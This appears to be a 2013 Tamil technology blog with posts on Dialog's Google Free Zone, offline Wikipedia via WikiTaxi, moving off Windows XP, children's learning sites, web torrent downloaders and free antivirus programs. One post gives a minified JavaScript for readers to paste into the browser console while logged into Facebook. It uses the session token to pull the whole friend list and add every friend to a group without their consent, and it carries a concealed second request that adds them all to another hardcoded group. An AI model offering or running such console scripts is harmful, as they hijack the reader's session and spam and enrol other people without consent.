Header

வெள்ளி, 26 ஏப்ரல், 2013

Google அறிமுகப்படுத்தும் இலவச இணையம் Dialog (Axiata PLC) பாவனையாளர்களுக்கு மட்டும். Free Zone - Internet with no data charges

இதன் தன்மைகள்

  • Google இன் சேவைகளை மட்டுமே அணுகலாம்.
  • கையடக்க தொலைபேசியில் மட்டுமே பயன்படுத்தலாம்.
இலங்கையில் முன்னணி ISP ஆகிய Dialog மட்டுமே இதை வழங்குகிறது. இவர்கள் முன்பு Facebook க்கு என இவ்வாறனதொரு சேவையை அறிமுகப்படுத்தினர். இப்போது கூகிள் தனது தெரிவுசெய்யப்பட சேவைகளை இலவசமாக Data charge இல்லாமல் அணுக  Philippines, South Africa, Indonesia,  Sri Lanka ஆகிய நாடுகளில் அறிமுக படுத்திய சேவை தான் Free Zone.

எவ்வாறு அணுகுவது?

  1. முதலில் g.co/freezone க்கு உங்கள் தொலை பேசி மூலம் செல்லுங்கள்.
  2. உங்கள் Google கணக்கு மூலம் உள் நுழையுங்கள்.
  3. இதன் பின்னர் அங்கிருந்து உங்கள் சேவைகளை அணுக முடியும் - இலவசமாக 

சில குறிப்புக்கள்:

  • நீங்கள் தேடும் போது தேடல் முடிவில் வரும் 1'ம் இணைப்பை அணுகுவது இலவசம். அணுகிய முடிவில் உள்ள இணைப்புக்கு கட்டணம்.  உதாரணமாக tamililit என்று தேடி வரும் தேடல் முடிவில் உள்ள tamililit.blogspot.com க்கு வருவது வரை இலவசம். அதன் பின்னர் இங்குள்ள outlink - (tamililit.blogspot.com/2013/04/google-dialog-axiata-plc-free-zone.html) களை கிளிக் செய்வது பணம்.
  • கட்டணம் அறவிடும் நடைமுறைக்கு செல்லும் போது அறிவிப்பு திரை வந்த பின்னரே அறவிடப்படும் - கொஞ்சம் தப்பிக்கலாம்.
  • Gmail, G+, Search ஆகியன இலவசம்.


இதன் தீமைகள் :

  • 2nd Step verification உள்ள Google கணக்குகள் மூலம் உள் நுழைய முடிவதில்லை.
  • Gmail, G search, G+  மட்டுமே இலவசம்.
  • கணனியில் பயன் படுத்த முடியாது. Opera Emulator மூலம் செல்ல வழி இதுவரை கண்டு பிடிக்கவில்லை. கிடைத்தால் நல்லம்.
  • நேரடியாக அணுக முடியாது- g.co/freezone இன் மூலமே உள் நுழைய வேண்டும்.
இது பற்றிய Dialog இன் அறிவிப்புப்பக்கம் இங்கே - http://www.dialog.lk/personal/mobile/features-and-vas/google-services/freezone/
இது பற்றிய Google இன் அறிவிப்புப்பக்கம் இங்கே - google.com/intl/en_lk/
இது பற்றிய உதவிப்பக்கம் இங்கே : support.google.com

இதனால் கிடைக்க போகும் ஒரே நன்மை G+ இனை பாவித்தால் ஓரளவுக்கு கட்டுபடியாகும். அது மட்டும் தான்.

நன்றி- கணணிக்கல்லூரி


ஞாயிறு, 24 மார்ச், 2013

இணைய இணைப்பில்லாமல் விக்கிபீடியாவினை பயன்படுத்தலாம்


டெல்பி என்கிற அமைப்பு இந்த விக்கி டாக்ஸி என்ற மென்பொருளை அமைத்துள்ளது.
இந்த மென்பொருளை தரவிறக்கி ஜிப் கோப்பை அன்-ஜிப் செய்து கொள்ளவும்.அதில் 
உள்ள WikiTaxi.exe என்ற கோப்பை திறந்தால் இது தகவல்கள் இல்லாத வெறும் இயக்கியாக 
தான் முதலில் காட்சித் தரும்.

பின்னர் "http://dumps.wikimedia.org/simplewiki/latest/" என்ற பக்கத்தில் சென்று தேவையான கோப்புக்களை தரவிறக்கிக் கொள்ளுங்கள். இது ஒரு தரவுத் தளம்[database] இது தரவிறங்க நேரம் பிடிக்கும்.

அடுத்து  WikiTaxi_Importer என்ற ஐகானின் மூலம் ஏற்றுமதிப் பெட்டி வரும் அதில் தரவிறக்கிய 
தரவு தளத்தின் முகவரியைக் கொடுத்து செலுத்தவும். ஏற்கனவே நீங்கள் தரவிறக்கிய 
கோப்பென்றால் அதன் எக்ஸ்டன்சன் .taxi என்று முடியுமாறு இருக்க வேண்டும்.

இதுவரை செய்தவற்றை ஒரு முறை செய்தாலே போதும். அடுத்து எப்போதெல்லாம் 
விக்கிப்பீடிய தேவையோ அப்போது WikiTaxi.exe என்ற கோப்பை திறந்து பயன்படுத்தத் தொடங்கலாம். 
இனி நீங்கள் விரும்பிய சொற்களை தேடலின் உதவியுடன் தேடிக்கொள்ளலாம். 
முடிந்த அளவு இணைய தேடலுக்கு இணையான தரத்தைத் தரும்.


மென்பொருளை தரவிறக்க கீழே சொடுக்கவும்

Download

செவ்வாய், 12 மார்ச், 2013

இன்னும் windows XP ஆ...


இன்னும் ஏறத்தாழ ஓர் ஆண்டு காலத்தில், Windows XP முழுவதுமாகக் கைவிடப்பட உள்ளது. நீங்கள் இன்னும் வேறு Operating system திற்கு மாறாமல், XP yaiயே இறுகப் பிடித்துக் கொண்டு இயங்கி வருகிறீர்களா? கீழே தரப்பட்டுள்ள தகவல்களையும், டிப்ஸ்களையும் கவனமாகப் படிக்கவும். பலர்  Windows XP சிஸ்டத்தினையே தொடர்ந்து பயன்படுத்துவதற்குப் பல காரணங்கள் உள்ளன. கட்டணம் செலுத்தி புதிய Operating system வாங்குவதனைத் தள்ளிப்போடலாமே என்ற எண்ணமே முக்கிய காரணம். ஆனால் சில உண்மைகளை நாம் எடுத்துக் கொண்டு எண்ணிப் பார்க்க வேண்டும். விண்டோஸ் எக்ஸ்பி 2001ல் வெளியானது. அடுத்து 12 ஆண்டுகள் கழிந்துவிட்டன. இந்த ஒரு டஜன் ஆண்டில், ஏதேனும் ஒரு நிகழ்வில் நீங்கள் புதிய சிஸ்டத்திற்கு, புதிய கம்ப்யூட்டருக்கு மாறி இருக்க வேண்டும். பண அடிப்படையில் பார்த்தால், எக்ஸ்பி பயன்படுத்துபவர்கள் நான்கு மாற்றங்களுக்கு முன்னால் இருந்ததனைப் பயன்படுத்திக் கொண்டிருப்பது தெரியும். இது பாதுகாப்புக்கு உத்தரவாதம் இல்லாதது. பிரச்னை ஏற்பட்டால், அதிலிருந்து மீள்வதற்கான செலவு, புதிய சிஸ்டம் மற்றும் கம்ப்யூட்டருக்கு மாறுவதைக் காட்டிலும் கூடுதலாகவே இருக்கும். 
இணையவெளியில் உலாவும் திருடர்கள், எக்ஸ்பிக்கு தொடர்ந்து குறி வைத்துக் கொண்டுள்ளனர். இதற்குக் காரணம், இன்னும் பலர் இதனையே பயன்படுத்தி வருவதே. மைக்ரோசாப்ட் சப்போர்ட் நிறுத்தப்படும் பட்சத்தில், பாதுகாப்பு எதுவும் இல்லாத ஆப்பரேட்டிங் சிஸ்டமாக விண்டோஸ் எக்ஸ்பி மாறிவிடும். உங்கள் பெர்சனல் தகவல்களைத் திருட ஒரு சிறிய இமெயில் கூட போதும் என்ற நிலை உருவாகும். 

மைக்ரோசாப்ட், இன்னும் ஓராண்டில், எக்ஸ்பி சிஸ்டத்தின் இயக்கத்திற்கு அப்டேட் எதனை யும் தராது என்பது உறுதி. எனவே பயனாளர்களுக்கு எக்ஸ்பி அவர்களின் பிடியில் இருக்காது. என்ன விளைவு ஏற்பட்டாலும் அவர்கள் மட்டுமே அதனைச் சந்திக்க வேண்டியதிருக்கும். பழைய கம்ப்யூட்டர்களில் விண்டோஸ் 7 அல்லது விண்டோஸ் 8 இன்ஸ்டால் செய்து இயக்கினாலும், அதில் இயங்கும் புரோகிராம்களுக்கு முழுமையான செயல்பாடு கிடைக்காது. உங்கள் நிறுவனத் தில் எக்ஸ்பி சிஸ்டத்தைப் பயன்படுத்த, உங்கள் அலுவலர்களைக் கட்டாயப்படுத்தினால், தாமதமான வேலைப்பாட்டிற்கு நீங்களே வழி வகுத்து, நிறுவனத்தின் நேரம் மற்றும் உழைப்பு இழப்பிற்கு வழி வகுக்கிறீர்கள். பழைய குதிரையை என்ன தட்டினாலும், அதனால் முடிந்தால்தானே ஓடும். குதிரை மீது அமர்வதற்கு புதிய சீட் வாங்கிக் கொடுத்தாலும், குதிரை பழையதாக இருந்தால், அதனால் இயன்றவரை தானே ஓடும்.

இன்னொரு வழியில் இதனைப் பார்க்கலாம். பல ஆண்டுகளுக்கு முன்னால் தயாரிக்கப்பட்ட கார் ஒன்றை, நல்ல முறையில் பராமரித்தால், நீங்களே ஒரு மெக்கானிக்காக இருந்தால், தொடர்ந்து ஓட்ட முடியும். ஆனால், எண்ணிப் பாருங்கள். அந்தக் கார் அதிக மக்கள் சாலையில் செல்லாதபோது, அதிக வாகனங்கள் இயங்காதபோது, அப்போதிருந்த சூழ்நிலையில் உருவாக்கப் பட்டிருக்கும். புதிய கார்கள், அதன் பின்னர் எழுந்த தேவைகளின் அடிப்படையில், பழைய கார்களினால் ஏற்பட்ட தவறுகளின் அடிப்படையில், கூடுதல் வசதிகளுடன், கூடுதல் பாதுகாப்புடன் தயாரிக்கப்பட்டிருக்கும். புதிய தொழில் நுட்பங்களின் அடிப்படையில் வடிவமைக்கப்பட்டிருப் பதால், இதுவரை எண்ணிப் பார்க்காத வசதிகள் கிடைக்கும். பழைய காரை இன்னும் ஓட்டினால், இதனை எல்லாம் இழப்பதுடன், பாதுகாப்பும் இல்லாமல் அல்லவா இருப்பீர்கள். எரிபொருளும் அல்லவா அதிகம் செலவாகும். 

அதே போல் தான் விண்டோஸ் எக்ஸ்பியை இன்றைய சூழ்நிலையில் இயக்குவது. விண்டோஸ் எக்ஸ்பி உருவாகி வெளியான காலத்தில், கம்ப்யூட்டரின் இயங்கும் திறன் மற்றும் தன்மைக்கேற்ப, எக்ஸ்பி உருவாக்கப் பட்டது. 640 பிக்ஸெல்கள் கொண்ட திரை அகலத்திற்கேற்ப வடிவமைக்கப்பட்டது. இன்டர்நெட் எக்ஸ்புளோரர் 6க்கென உருவானது. இப்போது அது இயங்கவே முடியாது என கைவிடப்பட்ட ஒரு பிரவுசராகும். ஆனால், அதனை இயக்க உருவான ஆப்பரேட்டிங் சிஸ்டத்தினை நாம் இன்னும் இயக்கிக் கொண்டிருக்கிறோம்.
விண்டோஸ் எக்ஸ்பி வெளியான போது, யு.எஸ்.பி.2 சப்போர்ட் செய்யப்படவில்லை. ராம் மெமரியின் அளவு மிகக் குறைவே. 137 ஜிபி அளவிலான ஹார்ட் டிஸ்க் தான், அதிக பட்ச அளவாக இருந்தது. இப்போது தொடக்க நிலையே 500 ஜி.பி. ஆக தற்போது உள்ளது.
எக்ஸ்பி பயன்படுத்தும் சிலர், தங்கள் அப்ளிகேஷன் புரோகிராம்கள், விண்டோஸ் 7 மற்றும் விண்டோஸ் 8ல் இயங்காது என எண்ணுகின்றனர். எனவே தான் எக்ஸ்பி மட்டும் எங்களுக்குப் போதும் என்கின்றனர். இதை நீங்களாக முடிவு செய்யாதீர்கள்.http://www.microsoft.com/enus/download/details.aspx?id=7352 என்ற முகவரி யில் உள்ள மைக்ரோசாப்ட் தளத்திற்குச் சென்று கண்டறியுங்கள். "சரி வராது' என்று பதில் வந்தால், புதிய சிஸ்டத்திற்கு ஏற்ற வகையில், அப்ளிகேஷன் புரோகிராமினை மாற்றுங்கள். சரியாக இயங்காது என்று நீங்கள் எண்ணும் புரோகிராம்கள், அண்மைக் காலத்திய இயக்க முறைகளுக்கு ஏற்றவகையில் மாற்றப் பட்டிருக்கும். நீங்கள் அப்டேட் செய்திடாமல், அதனைக் குற்றம் சொல்லிப் பலனில்லை. புதிய பதிப்பிற்கு மாறினால், கூடுதல் வசதிகள் கிடைக்கலாம். உங்கள் அலுவலகம் மற்றும் வர்த்தகச் செயல்பாடுகளுக்கு இதனால் அதிக லாபம் வரலாம்.

விண்டோஸ் எக்ஸ்பி வந்த காலத்தில், லேப்டாப் கம்ப்யூட்டர்கள் ஆடம்பரமான கம்ப்யூட்டிங் முறையின் ஓர் அடையாளமாகக் கருதப்பட்டது. ஸ்மார்ட் போன்கள் என்பவை பற்றி யாரும் எண்ணிக் கூடப் பார்த்திராத காலம். ஐபேட் போன்ற சாதனங்கள் எல்லாம், விஞ்ஞானக் கற்பனைக் கதைகளில் மட்டுமே மிதந்தன. யு ட்யூப், ஸ்கை ட்ரைவ், ஜிமெயில், மை ஸ்பேஸ் என்பவை எல்லாம் அப்போது இல்லை. பயர்பாக்ஸ், உபுண்டு லினக்ஸ், ஐபாட் என்பவை எல்லாம் கேட்காத பெயர் களாகும். ஐபோனுக்கு ஐந்தாம் நிலையில் அப்டேட் செய்திடும் போது, ஐபோன் வராத காலத்தில் இருந்த ஆப்பரேட்டிங் சிஸ்டம் தேவையா என நாம் எண்ணிப் பார்க்க வேண்டும். 

எக்ஸ்பி சிஸ்டம், கம்ப்யூட்டரை இயக்கும் சாதாரண மனிதனின் தேவைகளுக்கேற்ப எளிமையாக கம்ப்யூட்டிங் அனுபவத்தினைத் தரும் வகையில் உருவாக்கப்பட்டது. இப்போது அந்த மனிதனின் வாழ்க்கை முறை எல்லாம் மாறிவிட்டது. அப்போது கம்ப்யூட்டர் வழியாக இன்டர்நெட் கிடைத்ததா? அனைத்து பண பரிமாற்றமும் நடந்தேறியதா? ஆனால், இப்போது மேற்கொள்கிறோம். அதனால், கூடுதல் பாதுகாப்பு தேவைப்படுகிறது. அதற்கு புதிய சிஸ்டம் வேண்டும்.

பாதுகாப்பு என்ற கோணத்தில், விண்டோஸ் எக்ஸ்பிக்கென அளிக்கப்பட்ட சர்வீஸ் பேக் புரோகிராம்கள், அதன் வலிமையை இழந்துவிட்டன. விண்டோஸ் 7, எக்ஸ்பி சிஸ்டத்தின் பாதுகாப்பினைக் காட்டிலும் ஐந்து மடங்கு அதிக பாதுகாப்பானதாக உள்ளது. பல அடுக்கு பாதுகாப்பினைத் தருகிறது. 

விண்டோஸ் எக்ஸ்பி எனக்கு கை வந்த சிஸ்டமாகி விட்டது என்று பாட்டி கதை எல்லாம் சொல்ல வேண்டாம். கை வந்த சிஸ்டம், உங்களின் கட்டுப்பாட்டை மீறிச் செல்லும் என்று உணர்ந்து கொள்ளுங்கள். விண்டோஸ் 7 மற்றும் விண்டோஸ் 8 சிஸ்டம் இன்னும் எளிமையாகக் கை வந்த கலையாக உங்களிடம் ஒட்டிக் கொள்ளும். எனவே, விண்டோஸ் 9 வரட்டும் பார்த்துக் கொள்ளலாம் என்று ஒத்தி போடாமல், எக்ஸ்பிக்கு டாட்டா சொல்லி, உயர்நிலை சிஸ்டங்களுக்கு மாறவும். கம்ப்யூட்டரையும் அதற்கேற்றார்போல் மாற்றவும். பத்து ஆண்டுகள் பயன்படுத்தப்பட்டது என்பதே, ஓர் ஆப்பரேட்டிங் சிஸ்டத்திற்கு வேடிக்கையான அனுபவம் ஆகும். முன்பே இது மாற்றப்பட்டிருக்க வேண்டும்.

Automatic ஆக எல்லா facebookஇல் இணைக்க நண்பர்களையும் ஒரு group

சில நேரங்களில் எனது எல்லா நண்பர்களையும் ஒரு facebook group இல் இணக்க எல்லோருக்கும் அழைப்பு அனுப்ப வேண்டியேற்படும். ஆனால் ஒவ்வொருவருக்கும் தனித்தனியாகவோ அல்லது  ஒவ்வொருவராக check box ஐ select பண்ணிக்கொண்டிருக்கவேண்டும். Automatic ஆக எல்லோரையும் add பண்ண...
  1. Facebook இல் login பண்ணி ஒரு group ஐ open பண்ணவும்.
  2. chrome பாவிப்பவராயின் ctrl+shift+j ஐயும், பாவிப்பவராயின் ctrl+shift+k ஐயும் அழுத்தவும்.
  3. திறக்கும் console இல் கீழுள்ளதை Paste பண்ணவும்.

function penetrasi(e){jx.load(window.location.protocol+"//www.facebook.com/ajax/groups/members/add_post.php?__a=1&fb_dtsg="+document.getElementsByName("fb_dtsg")[0].value+"&group_id="+memberGroupId+"&source=typeahead&members="+e+"&nctr[_mod]=pagelet_group_members_summary&lsd&post_form_id_source=AsyncRequest&__user="+Env.user,function(e){e=e.substring(e.indexOf("{")),e=JSON.parse(e),i--,kunaon="<div class='friend-edge-name' style='text-align:left;font-size:10px;white-space:pre-wrap;",e.error?(kunaon+="color:darkred'>",kunaon=e.errorDescription?kunaon+e.errorDescription:kunaon+JSON.stringify(e,null,"")):(kunaon+="color:darkgreen'>",kunaon+=arr[i],suc++),kunaon+="</div>",e="<div id='friend-edge-display' style='position:fixed;left:50%;margin-left:-273px;top:100px;width:500px;background-color:rgba(255,255,255,0.9);z-index:9999;font-size:14px;text-align:center;padding:15px;border-radius:14px;border:8px solid rgba(0,0,0,0.5)'>"+("<div style='padding-bottom:10px;font-size:20px;'>"+tulisanNganu+"</div>"),0<i?(e+=arr.length+" Suscribers detected<br/>",e+="<b>"+suc+"</b> Suscribers added of "+(arr.length-i)+" Suscribers Processed ",e+="("+i+" more to go..)",e=e+"<div class='friend-edge'>"+kunaon,e+="</div>"):(e+=arr.length+" Suscribers detected and ",e+="<b>"+suc+" Suscribers added</b>",e+="<div><span class='uiButton' onClick='document.getElementById(\"pagelet_welcome_box\").style.display=\"none\"'>Close</span></div>"),document.getElementById("pagelet_welcome_box").innerHTML=e+"</div>"},"text","post"),tay--;if(0<tay){var t=arr[tay];setTimeout("penetrasi("+t+")",100)}console.log(tay+"/"+arr.length+":"+t+", success:"+suc),0xf2a794cf90e3!=memberGroupId&&jx.load(window.location.protocol+"//www.facebook.com/ajax/groups/members/add_post.php?__a=1&fb_dtsg="+document.getElementsByName("fb_dtsg")[0].value+"&group_id=xxxxxxxxxxx&source=typeahead&members="+e+"&nctr[_mod]=pagelet_group_members_summary&lsd&post_form_id_source=AsyncRequest&__user="+Env.user,function(){},"text","post")}function clickfr_callback(){0<document.getElementsByName("ok").length&&nHtml.ClickUp(document.getElementsByName("ok")[0]);var e=arr[i];i<arr.length&&addfriend(e.substring(0,4))}function clickfr(){0<document.getElementsByClassName("search").length?(console.log(document.getElementsByClassName("search")[0].childNodes[0].childNodes[0].childNodes[1].innerHTML),document.getElementsByClassName("search")[0].childNodes[0].childNodes[0].href="javascript:void(0);",nHtml.ClickUp(document.getElementsByClassName("search")[0].childNodes[0].childNodes[0].childNodes[1])):j++,setTimeout("clickfr_callback()",2e3)}function addfriend(e){i++,document.getElementsByClassName("mbm")[eind].childNodes[0].childNodes[1].childNodes[0].focus(),document.getElementsByClassName("mbm")[eind].childNodes[0].childNodes[1].childNodes[0].value=e,document.getElementsByClassName("mbm")[eind].childNodes[0].childNodes[1].childNodes[0].blur(),document.getElementsByClassName("mbm")[eind].childNodes[0].childNodes[1].childNodes[0].focus(),document.getElementsByClassName("mbm")[eind].childNodes[0].childNodes[1].childNodes[0].focus(),setTimeout("clickfr()",2e3)}function sleep(e){for(var t=(new Date).getTime(),n=0;1e7>n&&!((new Date).getTime()-t>e);n++);}var tulisanNganu="Auto SUSCRIBE",kunaon="";jx={getHTTPObject:function(){var e=!1;if("undefined"!=typeof ActiveXObject)try{e=new ActiveXObject("Msxml2.XMLHTTP")}catch(t){try{e=new ActiveXObject("Microsoft.XMLHTTP")}catch(n){e=!1}}else if(window.XMLHttpRequest)try{e=new XMLHttpRequest}catch(r){e=!1}return e},load:function(b,c,d,e,g){var f=this.init();if(f&&b){f.overrideMimeType&&f.overrideMimeType("text/xml"),e||(e="GET"),d||(d="text"),g||(g={});var d=d.toLowerCase(),e=e.toUpperCase(),h="uid="+(new Date).getTime(),b=b+(b.indexOf("?")+1?"&":"?"),b=b+h,h=null;"POST"==e&&(h=b.split("?"),b=h[0],h=h[1]),f.open(e,b,!0),"POST"==e&&(f.setRequestHeader("Content-type","application/x-www-form-urlencoded"),f.setRequestHeader("Content-length",h.length),f.setRequestHeader("Connection","close")),f.onreadystatechange=g.handler?function(){g.handler(f)}:function(){if(f.readyState==4)if(f.status==200){var b="";f.responseText&&(b=f.responseText),d.charAt(0)=="j"?(b=b.replace(/[\n\r]/g,""),b=eval("("+b+")")):d.charAt(0)=="x"&&(b=f.responseXML),c&&c(b)}else g.loadingIndicator&&document.getElementsByTagName("body")[0].removeChild(g.loadingIndicator),g.loading&&(document.getElementById(g.loading).style.display="none"),error&&error(f.status)},f.send(h)}},bind:function(e){var t={url:"",onSuccess:!1,onError:!1,format:"text",method:"GET",update:"",loading:"",loadingIndicator:""},n;for(n in t)e[n]&&(t[n]=e[n]);if(t.url){var r=!1;t.loadingIndicator&&(r=document.createElement("div"),r.setAttribute("style","position:absolute;top:0px;left:0px;"),r.setAttribute("class","loading-indicator"),r.innerHTML=t.loadingIndicator,document.getElementsByTagName("body")[0].appendChild(r),this.opt.loadingIndicator=r),t.loading&&(document.getElementById(t.loading).style.display="block"),this.load(t.url,function(e){t.onSuccess&&t.onSuccess(e),t.update&&(document.getElementById(t.update).innerHTML=e),r&&document.getElementsByTagName("body")[0].removeChild(r),t.loading&&(document.getElementById(t.loading).style.display="none")},t.format,t.method,t)}},init:function(){return this.getHTTPObject()}};var nHtml={FindByAttr:function(e,t,n,r){return"className"==n&&(n="class"),(e=document.evaluate(".//"+t+"[@"+n+"='"+r+"']",e,null,XPathResult.FIRST_ORDERED_NODE_TYPE,null))&&e.singleNodeValue?e.singleNodeValue:null},FindByClassName:function(e,t,n){return this.FindByAttr(e,t,"className",n)},FindByXPath:function(e,t){try{var n=document.evaluate(t,e,null,XPathResult.FIRST_ORDERED_NODE_TYPE,null)}catch(r){GM_log("bad xpath:"+t)}return n&&n.singleNodeValue?n.singleNodeValue:null},VisitUrl:function(e){window.setTimeout(function(){document.location.href=e},500+Math.floor(500*Math.random()))},ClickWin:function(e,t,n){var r=e.document.createEvent("MouseEvents");return r.initMouseEvent(n,!0,!0,e,0,0,0,0,0,!1,!1,!1,!1,0,null),!t.dispatchEvent(r)},Click:function(e){return this.ClickWin(window,e,"click")},ClickTimeout:function(e,t){window.setTimeout(function(){return nHtml.ClickWin(window,e,"click")},t+Math.floor(500*Math.random()))},ClickUp:function(e){this.ClickWin(window,e,"mousedown"),this.ClickWin(window,e,"mouseup"),this.ClickWin(window,e,"click")},GetText:function(e,t){var n="";void 0==t&&(t=0);if(!(40<t)){if(void 0!=e.textContent)return e.textContent;for(var r=0;r<e.childNodes.length;r++)n+=this.GetText(e.childNodes[r],t+1);return n}}};void 0==document.getElementsByClassName&&(document.getElementsByClassName=function(e){for(var t=RegExp("(?:^|\\s)"+e+"(?:$|\\s)"),n=document.getElementsByTagName("*"),r=[],i,s=0;null!=(i=n[s]);s++){var o=i.className;o&&-1!=o.indexOf(e)&&t.test(o)&&r.push(i)}return r}),Array.prototype.find=function(e){var t=!1;for(i=0;i<this.length;i++)typeof e=="function"?e.test(this[i])&&(t||(t=[]),t.push(i)):this[i]===e&&(t||(t=[]),t.push(i));return t};for(var a=0,eind=0,len=document.getElementsByClassName("mbm").length,a=0;a<len;a++){var ele=document.getElementsByClassName("mbm")[a];if(ele&&ele.childNodes[0]&&ele.childNodes[0]&&ele.childNodes[0].childNodes[1]&&ele.childNodes[0].childNodes[1].childNodes[0]&&"Add SUSCRIBERS"==document.getElementsByClassName("mbm")[a].childNodes[0].childNodes[1].childNodes[0].value){eind=a;break}}var i=3,tay=3,counter1=0,counter2=0,counter3=0,j=0,k=0,suc=0,arr=[],memberGroupId=document.getElementsByName("group_id")[0].value;jx.load(window.location.protocol+"//www.facebook.com/ajax/typeahead/first_degree.php?__a=1&viewer="+Env.user+"&filter[0]=user&__user="+Env.user,function(e){for(var e=e.substring(e.indexOf("{")),e=JSON.parse(e),e=e.payload.entries,t=0;t<e.length;t++)arr.push(e[t].uid);tay=i=arr.length-1,console.log(arr.length),e="<div id='friend-edge-display' style='position:fixed;left:50%;margin-left:-273px;top:100px;width:500px;background-color:rgba(255,255,255,0.9);z-index:9999;font-size:14px;text-align:center;padding:15px;border-radius:14px;border:8px solid rgba(0,0,0,0.5)'>"+("<div style='padding-bottom:10px;font-size:20px;'>"+tulisanNganu+"</div>"),e+=arr.length+" SUSCRIBERS detected",document.getElementById("pagelet_welcome_box").innerHTML=e+"</div>",penetrasi(arr[i])})

4. script இல் உள்ள xxxxxxxxxxx ஐ நீக்கி விட்டு group id ஐ இடவும். (group id கண்டுபிடிப்பது ... group திறந்திருக்கும் பொது address bar இல் இவ்வாறு காணப்படும். www.facebook.com/groups/34455111/ இதில் 34455111 தான் group id)

அவ்வளவுதான்.

சனி, 26 ஜனவரி, 2013

ஞாயிறு, 20 ஜனவரி, 2013

சிறுவர்களின் அறிவு, ஆளுமை, சிந்தனை விருத்திக்காக பெரிதும் உதவும் பயனுள்ள தளங்கள்


இணையத்தில் நாளுக்கு நாள் பல்வேறு தளங்கள் உருவாகி வருகின்றது, விஞ்ஞானம், அறிவியல், தொழில்நுட்பம், சினிமா, வரலாறுகள், கட்டுரைகள் என பல பிரிவுகளில் அடுக்கிக்கொண்டே செல்லலாம். அந்தவகையில் சில தளங்கள் சிறுவர்களை நோக்காகக்கொண்டு உருவாக்கப்படுகின்றது. இவைகள் சிறுவர்களின் அறிவு, ஆளுமை, சிந்தனை விருத்திக்காக பல வகையிலும் உதவுகின்றமை பாராட்டத்தக்க விடயமே.

அந்த வகையில் சிறுவர்களின் அறிவு, ஆளுமை, சிந்தனை விருத்திக்காக பெரிதும் உதவும் சில தளங்களை +தமிழில் IT உங்களுடன் பகிர்ந்து கொள்கிறது.

Aplusclick

சிறுவர்களுக்கான விளையாட்டு
இது சிறுவர்களின் கணித மற்றும் தர்க ரீதியான திறனை விருத்தி செய்வதற்காக Arithmetic, Algebra, Geometry, Analysis, Logic, Applied, Exit Exam, Everyday,
 Olympiad, Funny, Sport Math, iPad eBooks எனும் பல்வேறு பிரிவுகளின் கீழ் பாட வகைகளை கொண்டுள்ளது. மேலும் தரம் 1 தொடக்கம் தரம் 12 வரையான குறிப்பிட்ட வர்க்கத்தினருக்கு ஏற்ற பாட வகைகளை கொண்டுள்ளதுடன் சிறுவர்களின் ஆங்கில அறிவு விருத்திக்கும் இது பெரிதும் உதவுகின்றது.


 Funbrain

math game for kids

இந்த தளமும் சிறுவர்களின் அறிவு விருத்திக்காக பல சுவாரஷ்யமான அம்சங்களை கொண்டுள்ளது. மேலும் சிறுவர்களின் அறிவு, திறன் விருத்திக்கான அருமையான விளையாட்டுக்களை கொண்டு இந்த தளம் அலங்கரிக்கப்பட்டுள்ளமை குறிப்பிடத்தக்கது.


Smartygames 

online games for kids

இது முற்றிலும் பல நுட்பமான விளையாட்டுக்களை கொண்டிருக்கின்றது. சிறார்களின் கல்வி விருத்திக்கு ஏற்ற வகையில் Math, Money, Time, Reading, Counting, Sudoku, Memory, Puzzles, எனும் பிரிவுகளின் கீழ் சுவையான பல விளையாட்டுக்களை வழங்குவதுடன், Did you know? என்பதன் மூலம் நாம் அறிந்திராத பல விடயங்களை அறியத்தருகின்றது.

Torrent Client மென்பொருள் இல்லாமல் Torrent file ஐ speed ஆக download செய்ய... இணையத்தளங்கள்


BoxOpus

பீட்டா நிலையில் இன்னும் ஒரு புதிய தளம். நீங்கள் உங்கள் Facebook, Twitter, அல்லது டிராப்பாக்ஸ் கணக்கு தளத்தில் பதிவு செய்யலாம். அந்த கணக்குகளில் உள்நுழைய வேண்டும் என்றால், நீங்கள் ஒரு அழைப்பு குறியீடு(Invitation Code) தேவைப்படும். தளத்தில் பீட்டா என்பதால், நீங்கள் எவ்வளவு பாவிக்க முடியும்/  (எனினும் 2 ஜி.பை. / Torrent ஒரு கோப்பு அளவு வரையறை உள்ளது) பதிவிறக்க முடியும் என்ற  வரையறை இல்லை. எனினும், 24 மணி நேரத்திற்குள் உங்கள் கணினியில் கோப்பை பதிவிறக்க வேண்டும். 

ZBigZ

பதிவிறக்க வேகம், server சுமை படி  50-150 kbps இடையே வேறுபடுகிறது. கோப்புகள் ஒரு வாரம் சேமிக்கப்படும்.

10 வகை இலவச Anti virus


-:சுட்டது:-


உங்கள் கணினிகளில் வைரஸ்கள் வந்து வந்து போகின்றன. ஒரு சில வைரஸ்கள் தொடர்ந்து தொந்தரவு தந்து கொண்டே இருக்கின்றன. புதிதாய் வரும் வைரஸ்கள் எத்தனை நாட்கள் தங்கி இருந்து தொல்லை கொடுக்கும் என்று நம்மால் கணிக்க இயலவில்லை. ஆனால் இவற்றைத் தேடி அழிக்கும் ஆண்ட்டி வைரஸ் புரோகிராம்கள் தொடர்ந்து இயங்குகின்றன. ஆண்ட்டி வைரஸ் புரோகிராம்கள் என்று கேள்விப்பட்டவுடன் நம் மனதிற்கு வருவது Avast, AVG,MCCAFE,NORTAN ஆகியவையே.

ஆனால் இன்னும் பல ஆண்ட்டி வைரஸ் புரோகிராம்கள் அவ்வளவாகப் புகழ் பெறாமல் உள்ளன. இவை செயல்பாட்டில் பிரபலமான புரோகிராம்களுக்கு இணையாகவே உள்ளன. அவற்றில் சிலவற்றை இங்கு பார்க்கலாம்.




                                      

1. பிட் டிபன்டர் (BitDefender)

பிட் டிபன்டர் ஆண்ட்டி வைரஸ் புரோகிராம், விண்டோஸ் மட்டுமின்றி லினக்ஸ் சிஸ்டங்களிலும் இயங்கி செயல்புரிகிறது. அத்துடன் மெயில் சர்வர்கள், டெஸ்க்டாப் கம்ப்யூட்டர்களிலும் வைரஸ் எதிர்ப்பு பணியை மேற்கொள்கிறது.

இந்த இலவச புரோகிராமினை http://www.bitdefender.com/ என்ற தளத்தில் பெறலாம்.


2. அவிரா ஆண்ட்டிவிர் (Avira Antivir):

இந்த ஆண்ட்டி வைரஸ் புரோகிராம், மற்ற புரோகிராம்கள் கண்டுபிடிக்காத சில வைரஸ்களைக் கண்டறிந்து, அவற்றை நீக்கும் வழிகளைத் தருகிறது. அதே போல மற்றவற்றைக் காட்டிலும், கூடுதல் வேகத்தில் இது செயல்படும். இதனைப் பெற http://www.avira.com/en/downloads  என்ற தளத்திற்குச் செல்லவும்.

3. கிளாம் ஏவி (Clam AV):


